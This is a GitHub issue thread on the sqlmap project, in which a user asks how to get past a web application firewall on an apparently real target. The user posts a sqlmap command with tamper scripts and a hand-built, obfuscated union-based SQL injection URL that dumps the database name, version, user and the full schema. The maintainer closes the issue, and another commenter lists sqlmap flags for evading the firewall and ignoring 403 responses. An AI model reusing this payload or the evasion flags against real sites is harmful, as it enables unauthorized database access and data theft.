### ISSUE TITLE
PLEASE HELP . NOT A BUG REPORT JUST ASKING FOR HELP

### ISSUE THREAD

**Issue by artzzzy** [sqlmapproject/sqlmap#5832]
can you help me because i cant retrieve any data or bypassing this waf. already try all waf

sqlmap -u "http://www.target.com/about.php?ID=13" --tamper=space2plus,versionedkeywords --dbms=MYSQL --random-agent --level=5 --risk=3

and the response are 403 (Forbidden) - 15210 times . but when i try it by myself it working fine

http://wwwtarget.com/about.php?ID=.13+union+select+1,concat%23%0a(0x5a65726f20546f204865726f,0x3c62723e,0x3c62723e,0x44617461626173655f4e616d65203a3a ,database(),0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,User()),3,(/*!50000select%23%0A*/(@a)/*!50000from%23%0A*/(/*!50000select%23%0A*/(@a:=0x00)%23%0A,(/*!50000select%23%0A*/%23%0A(@a)from(/*!50000information_schema%23%0A*/./*!50000columns%23%0A*/)/*!50000where%23%0A*/(/*!50000table_schema%23%0A*/!=0x696e666f726d6174696f6e5f736368656d61)/*!50000and%23%0A*/(@a)in%23%0A(@a:=concat%23%0A(@a,/*!50000table_name%23%0A*/,0x203a3a20,/*!50000column_name%23%0A*/,0x3c62723e))))a),5,6,7,8,9,10--+-

**Comment by stamparm** [comment]
WAFs don't like scanners. i won't mind if anybody wants to help you. closing this down as its not a sqlmap issue

**Comment by lekosbelas** [comment]
Hey brother there are few things you can try the right tampers, time-sec, proxy list, lowering threads and more things I will add down.
--time-sec=10 
--proxy 
--random-agent 
--tamper=""
--unstable
--text-only
--threads= 
--drop-set-cookie
--unstable
--skip-heuristics 
--skip-waf
--ignore-code=403

It's more like try and find, good luck
